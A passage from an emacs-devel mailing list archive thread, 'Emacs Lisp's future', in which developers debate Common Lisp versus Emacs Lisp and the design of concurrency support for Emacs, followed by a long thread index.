codebase in the same language. (If Elisp is completely discarded, we will not have enough people to convert *all* existing cool packages discovered and yet to be discovered from elisp to CL.) So it is a lose-lose situation whether Elisp and CL co-exist or even if CL completely replaces Elisp. -- Kaushal Modi [-- Attachment #2: Type: text/html, Size: 4404 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 16:18 ` Søren Pilgård 2016-10-07 16:25 ` Kaushal Modi @ 2016-10-08 2:09 ` Tom Tromey 2016-10-08 20:58 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Tom Tromey @ 2016-10-08 2:09 UTC (permalink / raw) To: Søren Pilgård; +Cc: Lars Brinkhoff, emacs-devel >>>>> "Søren" == Søren Pilgård <fiskomaten@gmail.com> writes: Søren> Be aware that Emacs lisp is not Common lisp and such a mapping does Søren> have some pitfalls, especially around dynamic scoping and buffer local Søren> variables. Søren> I remember some blogposts about this (from 2012) Søren> http://tromey.com/blog/?p=709 http://tromey.com/blog/?p=751 Søren> http://tromey.com/blog/?p=778 I still love this wacky idea, but I pretty much moved on to: https://github.com/tromey/el-compilador The basic idea here being to eventually write Emacs in Emacs Lisp. I no longer think the language needs a radical change. It can just evolve in place. Tom ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 2:09 ` Tom Tromey @ 2016-10-08 20:58 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2016-10-08 20:58 UTC (permalink / raw) To: Tom Tromey; +Cc: fiskomaten, lars, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > The basic idea here being to eventually write Emacs in Emacs Lisp. It would be a lot of work, for little benefit. Let's put our time instead into things that will really help users. -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 10:47 ` Lars Brinkhoff ` (2 preceding siblings ...) 2016-10-07 16:18 ` Søren Pilgård @ 2016-10-07 17:07 ` John Wiegley 2016-10-09 12:03 ` Toon Claes 3 siblings, 1 reply; 404+ messages in thread From: John Wiegley @ 2016-10-07 17:07 UTC (permalink / raw) To: Lars Brinkhoff; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 667 bytes --] >>>>> "LB" == Lars Brinkhoff <lars@nocrew.org> writes: LB> Now that we have new maintainers, I'd be curious to hear if they have any LB> thoughs on this? (See the original post for more information.) No particular thoughts from me right now. I'm curious to see what happens with Guile, but I'm not eager to change. It would be nice to have real compilation of Emacs Lisp after the manner of Common Lisp, and maybe the concurrency support; but otherwise Emacs Lisp works pretty well for our use cases. -- John Wiegley GPG fingerprint = 4710 CF98 AF9B 327B B80F http://newartisans.com 60E1 46C4 BD1A 7AC1 4BA2 [-- Attachment #2: signature.asc --] [-- Type: application/pgp-signature, Size: 629 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 17:07 ` John Wiegley @ 2016-10-09 12:03 ` Toon Claes 2016-10-09 12:33 ` Eli Zaretskii 2016-10-09 12:43 ` Søren Pilgård 0 siblings, 2 replies; 404+ messages in thread From: Toon Claes @ 2016-10-09 12:03 UTC (permalink / raw) To: John Wiegley; +Cc: Lars Brinkhoff, emacs-devel [-- Attachment #1: Type: text/plain, Size: 407 bytes --] On 7 Oct 2016, at 19:07, John Wiegley <jwiegley@gmail.com> wrote: > It would be nice to have real compilation > of Emacs Lisp after the manner of Common Lisp, and maybe the concurrency > support; Oh yes, please add concurrency support! Would it help if we would start a crowdfunding campaign for this? Because I know a few fellow emacs user who would definitely back it. Regards, Toon Claes [-- Attachment #2: Type: text/html, Size: 1178 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-09 12:03 ` Toon Claes @ 2016-10-09 12:33 ` Eli Zaretskii 2016-10-10 2:59 ` John Wiegley 2016-10-09 12:43 ` Søren Pilgård 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2016-10-09 12:33 UTC (permalink / raw) To: Toon Claes; +Cc: jwiegley, emacs-devel, lars > From: Toon Claes <toon@iotcl.com> > Date: Sun, 9 Oct 2016 14:03:18 +0200 > Cc: Lars Brinkhoff <lars@nocrew.org>, emacs-devel@gnu.org > > On 7 Oct 2016, at 19:07, John Wiegley <jwiegley@gmail.com> wrote: > > It would be nice to have real compilation > of Emacs Lisp after the manner of Common Lisp, and maybe the concurrency > support; > > Oh yes, please add concurrency support! > Would it help if we would start a crowdfunding campaign for this? Because I know a few fellow emacs user > who would definitely back it. There's already a concurrency branch in the Emacs repository. It needs some work before it could be merged to master, so if there are people here who wants this badly enough, I suggest that they continue work almost done by Tom Tromey, who developed that branch, instead of starting anew. TIA. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-09 12:33 ` Eli Zaretskii @ 2016-10-10 2:59 ` John Wiegley 2016-10-10 15:24 ` raman 0 siblings, 1 reply; 404+ messages in thread From: John Wiegley @ 2016-10-10 2:59 UTC (permalink / raw) To: Eli Zaretskii; +Cc: lars, Toon Claes, emacs-devel [-- Attachment #1: Type: text/plain, Size: 2692 bytes --] >>>>> Eli Zaretskii <eliz@gnu.org> writes: > There's already a concurrency branch in the Emacs repository. It needs some > work before it could be merged to master, so if there are people here who > wants this badly enough, I suggest that they continue work almost done by > Tom Tromey, who developed that branch, instead of starting anew. I think it needs more than just a little work. I spoke to Tom on the phone last year, and we both agreed it's not a foregone conclusion that that branch represents the right way of approaching concurrency for an application like Emacs. In general, users don't want programmatic concurrency. What they want is for Emacs not to freeze up after they've asked it to do something. And there are other ways of achieving this end -- depending on the nature of the problem -- than making concurrency a first-class citizen, with the innumerable problems it brings. I fear we'd be debugging subtle interaction issues for the rest of our lives if we just merged Tom's branch in today. It implements a Java-style form of concurrency, dependent on mutexes and locking to achieve coherency, which is fiendishly difficult to get right, even if you confine its use to just a few small tasks. The hardest bug I ever debugged in my life was a concurrency bug; the second hardest wasn't even close (and thankfully, I didn't try to solve it at the same time). I'd much rather we re-examine the goals we want to achieve with concurrency, an then ask if there are other ways to get there besides, well, concurrency. For example, if we had a lightweight forking mechanism with transparent communication between sub-ordinate processes (think async.el, but in C and highly efficient), I think we could achieve what users want, without the downsides developers don't want. Even the popular web browsers are moving in this direction, since it gives a similar effect to threading, but without as many of the downsides; or take the popularity of the Actor model, used to reduce the coherency problem down to just mailboxes. The reason I love Haskell for its STM concurrency (software transactional memory) is that it makes certain classes of problems impossible to express. I believe we would need a mechanism like that for Emacs Lisp, so no one ever has to hunt down cyclic mutex locks, or reference counts, or why two operations that should be atomic aren't. I'd rather have a single-threaded Emacs for a quite a while longer before inviting these sorts problems into our lives. -- John Wiegley GPG fingerprint = 4710 CF98 AF9B 327B B80F http://newartisans.com 60E1 46C4 BD1A 7AC1 4BA2 [-- Attachment #2: signature.asc --] [-- Type: application/pgp-signature, Size: 629 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-10 2:59 ` John Wiegley @ 2016-10-10 15:24 ` raman 0 siblings, 0 replies; 404+ messages in thread From: raman @ 2016-10-10 15:24 UTC (permalink / raw) To: Eli Zaretskii; +Cc: lars, Toon Claes, emacs-devel John Wiegley <jwiegley@gmail.com> writes: 1+ on this. >>>>>> Eli Zaretskii <eliz@gnu.org> writes: > >> There's already a concurrency branch in the Emacs repository. It needs some >> work before it could be merged to master, so if there are people here who >> wants this badly enough, I suggest that they continue work almost done by >> Tom Tromey, who developed that branch, instead of starting anew. > > I think it needs more than just a little work. I spoke to Tom on the phone > last year, and we both agreed it's not a foregone conclusion that that branch > represents the right way of approaching concurrency for an application like > Emacs. > > In general, users don't want programmatic concurrency. What they want is for > Emacs not to freeze up after they've asked it to do something. And there are > other ways of achieving this end -- depending on the nature of the problem -- > than making concurrency a first-class citizen, with the innumerable problems > it brings. I fear we'd be debugging subtle interaction issues for the rest of > our lives if we just merged Tom's branch in today. It implements a Java-style > form of concurrency, dependent on mutexes and locking to achieve coherency, > which is fiendishly difficult to get right, even if you confine its use to > just a few small tasks. The hardest bug I ever debugged in my life was a > concurrency bug; the second hardest wasn't even close (and thankfully, I > didn't try to solve it at the same time). > > I'd much rather we re-examine the goals we want to achieve with concurrency, > an then ask if there are other ways to get there besides, well, concurrency. > For example, if we had a lightweight forking mechanism with transparent > communication between sub-ordinate processes (think async.el, but in C and > highly efficient), I think we could achieve what users want, without the > downsides developers don't want. Even the popular web browsers are moving in > this direction, since it gives a similar effect to threading, but without as > many of the downsides; or take the popularity of the Actor model, used to > reduce the coherency problem down to just mailboxes. > > The reason I love Haskell for its STM concurrency (software transactional > memory) is that it makes certain classes of problems impossible to express. I > believe we would need a mechanism like that for Emacs Lisp, so no one ever has > to hunt down cyclic mutex locks, or reference counts, or why two operations > that should be atomic aren't. I'd rather have a single-threaded Emacs for a > quite a while longer before inviting these sorts problems into our lives. -- ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-09 12:03 ` Toon Claes 2016-10-09 12:33 ` Eli Zaretskii @ 2016-10-09 12:43 ` Søren Pilgård 2016-10-09 13:13 ` Philipp Stephani 2016-10-09 13:15 ` Eli Zaretskii 1 sibling, 2 replies; 404+ messages in thread From: Søren Pilgård @ 2016-10-09 12:43 UTC (permalink / raw) To: Toon Claes; +Cc: John Wiegley, emacs-devel, Lars Brinkhoff On Sun, Oct 9, 2016 at 2:03 PM, Toon Claes <toon@iotcl.com> wrote: > On 7 Oct 2016, at 19:07, John Wiegley <jwiegley@gmail.com> wrote: > > It would be nice to have real compilation > of Emacs Lisp after the manner of Common Lisp, and maybe the concurrency > support; > > > Oh yes, please add concurrency support! > Would it help if we would start a crowdfunding campaign for this? Because I > know a few fellow emacs user who would definitely back it. > > Regards, > Toon Claes The thing about concurrency is that it is very hard to integrate meaningfully and robustly into Emacs. All Emacs lisp code has the basic assumption, that when it is running, it is the only code running. Introducing concurrency would either break that assumption or have to make it explicit somehow, potentially breaking tons of existing code. As an example, lets say you have a plugin that count occurrences of a word, and another that corrects spelling mistakes. As it is now, the counting plugin can assume no other code runs when it counts and it can thus simply scan the buffer. But if we let both run simultaneously the spelling correcter could modify the buffer resulting in the wrong count as some were done before and some after the modification. Oh, but couldn't we then just let each buffer have its own "world" where everything is sequential? Well we would lose the ability for the spelling correcter to run while we were working negating the benefit. And further, what if the plugin counting occurrences gave the total count for all buffers? Then it would have to lock all buffers somehow, so no other code could modify them simultaneously. As you can see, introducing concurrency has wide implications for Emacs. Finding a way to go about it that will still allow old "naive" code to function correctly is what makes it so tough. Hopefully we will someday have that, but it requires a lot of hard work. Maybe we could start out with something like javascripts webworkers. A function running in its own world without access to buffers or other shared state, and then we could communicate by message passing. But as the keen eye would observe that is very similar to simply spawning an external process. And it wouldn't benefit much for problems that rely on buffers or global state. This problem will clearly not be solved just by switching the underlying platform. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-09 12:43 ` Søren Pilgård @ 2016-10-09 13:13 ` Philipp Stephani 2016-10-09 13:15 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Philipp Stephani @ 2016-10-09 13:13 UTC (permalink / raw) To: Søren Pilgård, Toon Claes Cc: Lars Brinkhoff, John Wiegley, emacs-devel [-- Attachment #1: Type: text/plain, Size: 1328 bytes --] Søren Pilgård <fiskomaten@gmail.com> schrieb am So., 9. Okt. 2016 um 14:44 Uhr: > On Sun, Oct 9, 2016 at 2:03 PM, Toon Claes <toon@iotcl.com> wrote: > > > As you can see, introducing concurrency has wide implications for Emacs. > > Finding a way to go about it that will still allow old "naive" code to > > function correctly is what makes it so tough. > > Hopefully we will someday have that, but it requires a lot of hard work. > > Maybe we could start out with something like javascripts webworkers. A > > function running in its own world without access to buffers or other > > shared state, and then we could communicate by message passing. > Yes, this is the right approach. It is clear that new threads couldn't be allowed to access existing global state (dynamic variables, buffers, obarray, ...); instead they would need to start with an empty global state. > > But as the keen eye would observe that is very similar to simply > > spawning an external process. > > And it wouldn't benefit much for problems that rely on buffers or global > state. > > > That is a good thing; code should not use global state. Threads should have a properly synchronized method of communicating with each other (e.g. CSP-style channels), but shouldn't be able to access each other's state. [-- Attachment #2: Type: text/html, Size: 2075 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-09 12:43 ` Søren Pilgård 2016-10-09 13:13 ` Philipp Stephani @ 2016-10-09 13:15 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2016-10-09 13:15 UTC (permalink / raw) To: Søren Pilgård; +Cc: lars, jwiegley, toon, emacs-devel > From: Søren Pilgård <fiskomaten@gmail.com> > Date: Sun, 9 Oct 2016 14:43:36 +0200 > Cc: John Wiegley <jwiegley@gmail.com>, emacs-devel@gnu.org, > Lars Brinkhoff <lars@nocrew.org> > > The thing about concurrency is that it is very hard to integrate > meaningfully and robustly into Emacs. See the concurrency branch in the Git repo for one possible way of doing that. > As you can see, introducing concurrency has wide implications for Emacs. > Finding a way to go about it that will still allow old "naive" code to > function correctly is what makes it so tough. Fortunately, these issues were already figured out, and the result needs just some final touches and some serious testing on various platforms. Motivated individuals are welcome to work on that branch and bring it up to speed. Thanks. ^ permalink raw reply [flat|nested] 404+ messages in thread
[parent not found: <"<54193A70.9020901"@member.fsf.org>]
end of thread, other threads:[~2016-10-17 0:44 UTC | newest] Thread overview: 404+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2014-09-17 7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen 2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier 2014-09-17 16:15 ` James Cloos 2014-09-17 17:53 ` Stefan Monnier 2014-09-17 21:46 ` Stefan Monnier 2014-09-18 1:09 ` James Cloos 2014-09-18 7:12 ` Helmut Eller 2014-09-18 7:46 ` Thorsten Jolitz 2014-09-18 18:59 ` Johan Bockgård 2014-09-18 21:01 ` Sam Steingold 2014-09-19 0:56 ` Stefan Monnier 2014-09-19 12:24 ` Sam Steingold 2014-09-26 13:43 ` Robin Templeton 2014-09-26 14:15 ` David Kastrup 2014-09-26 14:45 ` Dmitry Antipov 2014-09-26 15:05 ` David Kastrup 2014-09-27 8:44 ` Stephen J. Turnbull 2014-09-27 8:59 ` David Kastrup 2014-09-27 15:30 ` Stephen J. Turnbull 2014-09-26 15:07 ` Eli Zaretskii 2014-09-26 15:21 ` David Kastrup 2014-09-27 8:35 ` Stephen J. Turnbull 2014-09-27 8:49 ` David Kastrup 2014-09-27 9:32 ` Eli Zaretskii 2014-09-27 10:37 ` Stephen J. Turnbull 2014-09-27 11:13 ` David Kastrup 2014-09-27 12:00 ` Eli Zaretskii 2014-09-27 14:04 ` Stefan Monnier 2014-09-27 14:24 ` David Kastrup 2014-09-27 15:24 ` Stefan Monnier 2014-09-27 15:41 ` David Kastrup 2014-09-27 15:57 ` Stefan Monnier 2014-09-27 16:25 ` David Kastrup 2014-09-27 17:23 ` Stefan Monnier 2014-09-28 23:22 ` Richard Stallman 2014-09-29 1:33 ` Stefan Monnier 2014-09-29 20:48 ` Richard Stallman 2014-10-05 7:53 ` Mark H Weaver 2014-10-05 9:01 ` David Kastrup 2014-10-05 10:43 ` Stephen J. Turnbull 2014-10-05 11:10 ` David Kastrup 2014-10-05 11:56 ` Stephen J. Turnbull 2014-10-05 14:30 ` Mark H Weaver 2014-10-05 15:48 ` Stephen J. Turnbull 2014-10-05 18:29 ` Mark H Weaver 2014-10-05 21:49 ` Richard Stallman [not found] ` <"<83lhotme1e.fsf"@gnu.org> 2014-10-06 3:18 ` Stephen J. Turnbull 2014-10-06 19:15 ` Richard Stallman 2014-10-07 0:46 ` Stephen J. Turnbull 2014-10-07 14:04 ` Richard Stallman 2014-10-07 15:43 ` Stephen J. Turnbull 2014-10-07 16:01 ` David Kastrup 2014-10-07 18:15 ` Stephen J. Turnbull 2014-10-07 16:16 ` David Kastrup 2014-10-10 10:09 ` Thien-Thi Nguyen 2014-10-06 6:21 ` Mark H Weaver 2014-10-06 15:08 ` Eli Zaretskii 2014-10-06 15:33 ` David Kastrup 2014-10-06 16:24 ` Eli Zaretskii 2014-10-06 16:40 ` David Kastrup 2014-10-06 17:04 ` Stephen J. Turnbull 2014-10-06 17:34 ` David Kastrup 2014-10-07 0:33 ` Stephen J. Turnbull 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:37 ` Eli Zaretskii 2014-10-06 16:27 ` Mark H Weaver 2014-10-06 16:47 ` Eli Zaretskii 2014-10-06 17:31 ` David Kastrup 2014-10-06 17:58 ` David Kastrup 2014-10-07 2:35 ` Eli Zaretskii 2014-10-06 17:43 ` Stephen J. Turnbull 2014-10-06 17:53 ` David Kastrup 2014-10-07 0:35 ` Stephen J. Turnbull 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:21 ` David Kastrup 2014-10-07 15:16 ` Andreas Schwab 2014-10-07 15:33 ` David Kastrup 2014-10-07 15:42 ` Andreas Schwab 2014-10-07 16:03 ` David Kastrup 2014-10-07 16:16 ` Andreas Schwab 2014-10-07 16:24 ` David Kastrup 2014-10-07 16:31 ` Andreas Schwab 2014-10-07 16:52 ` David Kastrup 2014-10-07 17:38 ` Andreas Schwab 2014-10-08 0:47 ` Richard Stallman 2014-10-08 7:19 ` Eli Zaretskii 2014-10-08 7:37 ` David Kastrup 2014-10-06 18:04 ` Stefan Monnier 2014-10-06 23:00 ` Mark H Weaver 2014-10-07 1:04 ` Stefan Monnier 2014-10-07 14:03 ` Richard Stallman 2014-10-07 14:04 ` Richard Stallman 2014-10-07 14:14 ` David Kastrup [not found] ` <"<83y4srjaot.fsf"@gnu.org> 2014-10-07 15:15 ` Mark H Weaver 2014-10-07 15:31 ` Andreas Schwab 2014-10-07 15:40 ` David Kastrup 2014-10-07 18:32 ` Stephen J. Turnbull 2014-10-07 18:41 ` David Kastrup 2014-10-07 16:34 ` Mark H Weaver 2014-10-07 17:50 ` David Kastrup 2014-10-07 18:36 ` Mark H Weaver 2014-10-07 18:56 ` David Kastrup 2014-10-07 19:21 ` Stephen J. Turnbull 2014-10-07 23:11 ` Mark H Weaver 2014-10-08 3:03 ` David Kastrup 2014-10-08 15:03 ` Mark H Weaver 2014-10-08 15:11 ` Eli Zaretskii 2014-10-08 15:54 ` David Kastrup 2014-10-09 3:26 ` Stephen J. Turnbull 2014-10-09 4:14 ` David Kastrup 2014-10-09 7:31 ` Stephen J. Turnbull 2014-10-09 8:05 ` David Kastrup 2014-10-11 18:50 ` Florian Weimer 2014-10-07 16:59 ` Eli Zaretskii 2014-10-08 0:47 ` Richard Stallman 2014-10-08 7:13 ` Eli Zaretskii 2014-10-09 1:19 ` Richard Stallman 2014-10-09 7:21 ` Eli Zaretskii 2014-10-09 7:52 ` David Kastrup 2014-10-09 8:41 ` Eli Zaretskii 2014-10-09 9:22 ` David Kastrup 2014-10-13 3:04 ` Mark H Weaver 2014-10-13 7:41 ` David Kastrup 2014-10-10 14:24 ` Richard Stallman 2014-10-10 15:28 ` Eli Zaretskii 2014-10-11 1:15 ` Richard Stallman 2014-10-11 7:18 ` David Kastrup 2014-10-12 3:22 ` Richard Stallman 2014-10-11 7:18 ` Eli Zaretskii 2014-10-11 23:51 ` Mark H Weaver 2014-10-12 1:35 ` Stephen J. Turnbull 2014-10-12 8:38 ` David Kastrup 2014-10-12 12:16 ` Stephen J. Turnbull 2014-10-12 12:34 ` David Kastrup 2014-10-12 14:49 ` Stephen J. Turnbull 2014-10-12 16:50 ` David Kastrup 2014-10-13 2:40 ` Mark H Weaver 2014-10-13 4:49 ` Mark H Weaver 2014-10-13 3:08 ` Richard Stallman 2014-10-13 4:50 ` Stephen J. Turnbull 2014-10-13 3:41 ` Richard Stallman 2014-10-12 5:37 ` Eli Zaretskii 2014-10-12 3:24 ` Richard Stallman 2014-10-12 5:47 ` Eli Zaretskii 2014-10-13 3:07 ` Richard Stallman 2014-10-13 3:38 ` Richard Stallman 2014-10-10 14:24 ` Richard Stallman 2014-10-10 15:38 ` Eli Zaretskii 2014-10-11 1:17 ` Richard Stallman 2014-10-11 7:23 ` David Kastrup 2014-10-11 7:33 ` Eli Zaretskii 2014-10-12 3:22 ` Richard Stallman 2014-10-12 5:22 ` David Kastrup 2014-10-13 3:09 ` Richard Stallman 2014-10-13 3:44 ` Richard Stallman 2014-10-13 7:59 ` David Kastrup 2014-10-13 8:32 ` Eli Zaretskii 2014-10-13 9:20 ` David Kastrup 2014-10-12 5:44 ` Eli Zaretskii [not found] ` <<83r3yg9bpu.fsf@gnu.org> 2014-10-10 16:02 ` Drew Adams 2014-10-10 16:10 ` Eli Zaretskii 2014-10-09 7:36 ` David Kastrup 2014-10-10 14:25 ` Richard Stallman 2014-10-07 14:21 ` Andreas Schwab 2014-10-06 19:17 ` Richard Stallman 2014-10-06 19:59 ` David Kastrup 2014-10-07 0:10 ` Mark H Weaver 2014-10-07 14:04 ` Richard Stallman 2014-10-11 18:34 ` Florian Weimer 2014-10-05 21:49 ` Richard Stallman 2014-10-06 3:34 ` Stephen J. Turnbull 2014-10-08 0:48 ` Richard Stallman 2014-10-08 2:09 ` Stephen J. Turnbull 2014-10-08 3:07 ` David Kastrup 2014-10-09 3:06 ` Stephen J. Turnbull 2014-10-09 3:44 ` David Kastrup 2014-10-09 7:16 ` Stephen J. Turnbull 2014-10-09 7:47 ` Eli Zaretskii 2014-10-09 10:20 ` Stephen J. Turnbull 2014-10-10 14:23 ` Richard Stallman 2014-10-09 1:19 ` Richard Stallman 2014-10-09 3:56 ` Stephen J. Turnbull 2014-10-09 4:49 ` Mike Gerwitz 2014-10-09 8:00 ` Eli Zaretskii 2014-10-09 10:50 ` Stephen J. Turnbull 2014-10-09 11:06 ` David Kastrup 2014-10-09 17:23 ` Richard Stallman 2014-10-09 17:37 ` Eli Zaretskii 2014-10-12 3:24 ` Richard Stallman 2014-10-12 5:54 ` Eli Zaretskii 2014-10-13 3:10 ` Richard Stallman 2014-10-13 5:35 ` Stephen J. Turnbull 2014-10-13 6:02 ` Eli Zaretskii 2014-10-13 8:24 ` Stephen J. Turnbull 2014-10-13 8:58 ` David Kastrup 2014-10-13 9:45 ` Stephen J. Turnbull 2014-10-13 10:17 ` Uwe Brauer 2014-10-13 10:30 ` David Kastrup 2014-10-13 9:05 ` Eli Zaretskii 2014-10-13 10:05 ` Stephen J. Turnbull 2014-10-13 14:55 ` Paul Eggert 2014-10-13 17:18 ` Stephen J. Turnbull 2014-10-13 17:24 ` David Kastrup 2014-10-13 17:49 ` Stephen J. Turnbull 2014-10-13 18:04 ` David Kastrup 2014-10-13 19:19 ` Eli Zaretskii 2014-10-14 7:03 ` Stephen J. Turnbull 2014-10-14 7:41 ` Eli Zaretskii 2014-10-14 7:58 ` Eli Zaretskii 2014-10-14 10:06 ` Stephen J. Turnbull 2014-10-14 8:34 ` Stephen J. Turnbull 2014-10-14 9:21 ` Eli Zaretskii 2014-10-14 20:03 ` Paul Eggert 2014-10-15 3:07 ` Stephen J. Turnbull 2014-10-15 5:54 ` Paul Eggert 2014-10-15 7:17 ` Stephen J. Turnbull 2014-10-15 9:20 ` Eli Zaretskii 2014-10-15 11:34 ` Stephen J. Turnbull 2014-10-15 11:57 ` David Kastrup 2014-10-15 12:32 ` Eli Zaretskii 2014-10-15 13:22 ` Stephen J. Turnbull 2014-10-15 14:36 ` Eli Zaretskii 2014-10-15 14:51 ` David Kastrup 2014-10-15 16:57 ` Stephen J. Turnbull 2014-10-15 17:18 ` Paul Eggert 2014-10-15 18:39 ` Stephen J. Turnbull 2014-10-14 2:11 ` Richard Stallman 2014-10-13 5:43 ` Eli Zaretskii 2014-10-14 2:09 ` Richard Stallman 2014-10-14 6:24 ` Eli Zaretskii 2014-10-14 7:48 ` David Kastrup 2014-10-15 13:16 ` Richard Stallman 2014-10-15 14:32 ` Eli Zaretskii 2014-10-15 14:43 ` David Kastrup 2014-10-16 18:12 ` Richard Stallman 2014-10-13 3:46 ` Richard Stallman 2014-10-09 11:27 ` Eli Zaretskii 2014-10-10 14:23 ` Richard Stallman 2014-10-10 14:23 ` Richard Stallman 2014-10-10 20:41 ` Mark H Weaver 2014-10-10 21:56 ` Christopher Allan Webber 2014-10-10 22:56 ` Drew Adams 2014-10-11 1:17 ` Richard Stallman 2014-09-27 17:04 ` Taylan Ulrich Bayirli/Kammer 2014-09-27 19:33 ` Robin Templeton 2014-09-28 7:17 ` David Kastrup 2014-09-27 15:34 ` Stephen J. Turnbull 2014-09-29 13:17 ` K. Handa -- strict thread matches above, loose matches on Subject: below -- 2014-09-17 2:57 Emacs Lisp's future (was: Guile emacs thread (again)) Lally Singh 2014-09-17 11:01 ` Tom 2014-09-17 12:28 ` Emacs Lisp's future Stefan Monnier 2014-09-17 12:58 ` Tom 2014-09-17 13:39 ` Óscar Fuentes 2014-09-17 14:15 ` Tom 2014-09-17 11:43 ` Emacs Lisp's future (was: Guile emacs thread (again)) Richard Stallman 2014-09-17 14:21 ` Lally Singh 2014-09-17 15:04 ` Emacs Lisp's future Stefan Monnier 2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier 2014-09-16 16:03 ` Lennart Borgman 2014-09-17 18:24 ` Jorgen Schaefer 2014-09-17 18:42 ` Emacs Lisp's future Lars Brinkhoff 2014-09-18 2:07 ` Emacs Lisp's future (was: Guile emacs thread (again)) Alexis 2014-09-18 16:40 ` Emacs Lisp's future Daniel Colascione 2014-09-18 6:35 ` Andreas Röhler 2014-09-18 15:17 ` Richard Stallman 2014-09-18 16:19 ` Ivan Andrus 2014-09-18 23:19 ` Richard Stallman 2014-09-19 7:18 ` Andreas Röhler 2014-09-19 8:10 ` Andreas Schwab 2014-09-19 8:46 ` David Kastrup 2014-09-16 16:54 ` Emacs Lisp's future (was: Guile emacs thread (again)) Lars Brinkhoff 2014-09-17 15:14 ` Emacs Lisp's future Stefan Monnier 2014-09-17 16:57 ` Lars Brinkhoff 2014-09-16 16:59 ` David Kastrup 2014-09-16 22:58 ` Mark H Weaver 2014-09-16 23:10 ` Mark H Weaver 2014-09-17 13:55 ` David Kastrup 2014-09-17 15:19 ` Mark H Weaver 2014-09-17 16:23 ` David Kastrup 2014-09-17 18:10 ` Nic Ferrier 2014-09-17 5:04 ` mhw 2014-09-17 14:03 ` David Kastrup 2014-09-17 14:39 ` Mark H Weaver 2014-09-17 15:11 ` David Kastrup 2014-09-17 10:48 ` Lars Magne Ingebrigtsen 2014-09-17 10:53 ` Nic Ferrier 2014-09-17 11:21 ` David Kastrup 2014-09-17 11:22 ` Eli Zaretskii 2014-09-17 13:50 ` Phillip Lord 2014-09-17 11:17 ` Phillip Lord 2014-09-17 11:35 ` Nic Ferrier 2014-09-17 12:50 ` Stefan Monnier 2014-09-17 13:54 ` Phillip Lord 2014-09-17 14:24 ` Eli Zaretskii 2014-09-17 14:30 ` David Kastrup 2014-09-17 15:03 ` Eli Zaretskii 2014-09-17 15:10 ` Phillip Lord 2014-09-18 7:54 ` Thorsten Jolitz 2014-09-17 15:09 ` Stefan Monnier 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 15:33 ` David Kastrup 2014-09-17 20:11 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 22:42 ` Daniel Colascione 2014-09-18 2:34 ` Stefan Monnier 2014-09-18 3:17 ` David Kastrup 2014-09-18 9:04 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 9:27 ` David Kastrup 2014-09-18 11:15 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 3:46 ` David Kastrup 2014-09-18 9:53 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 10:09 ` David Kastrup 2014-09-18 11:29 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 12:07 ` David Kastrup 2014-09-18 14:12 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 14:56 ` David Kastrup 2014-09-18 15:36 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 16:44 ` David Kastrup 2014-09-17 17:13 ` Eli Zaretskii 2014-09-17 17:33 ` Stefan Monnier 2014-09-17 20:21 ` Richard Stallman 2014-09-18 12:48 ` Phillip Lord 2014-09-18 14:15 ` Rasmus 2014-09-18 14:34 ` Phillip Lord 2014-09-18 15:01 ` Rasmus 2014-09-18 16:08 ` Phillip Lord 2014-09-18 16:18 ` Rasmus 2014-09-18 19:23 ` Stefan Monnier 2014-09-18 23:18 ` Richard Stallman 2014-09-19 0:00 ` Rasmus 2014-09-19 8:00 ` Nic Ferrier 2014-09-19 10:46 ` Stephen J. Turnbull 2014-09-19 11:12 ` David Kastrup 2014-09-19 16:16 ` Stephen J. Turnbull 2014-09-19 11:38 ` Nic Ferrier 2014-09-19 18:02 ` Richard Stallman 2014-09-19 11:53 ` Rasmus 2014-09-19 18:01 ` Richard Stallman [not found] ` <<E1XV2UO-0005CA-Vk@fencepost.gnu.org> 2014-09-19 18:43 ` Drew Adams 2014-09-18 23:17 ` Richard Stallman 2014-09-19 0:03 ` Rasmus 2014-09-19 10:27 ` Eric S. Raymond 2014-09-23 7:45 ` Emilio Lopes 2014-09-26 16:50 ` Jonas Bernoulli 2014-09-26 18:23 ` Christopher Allan Webber 2014-09-29 8:33 ` Phillip Lord 2014-09-29 13:19 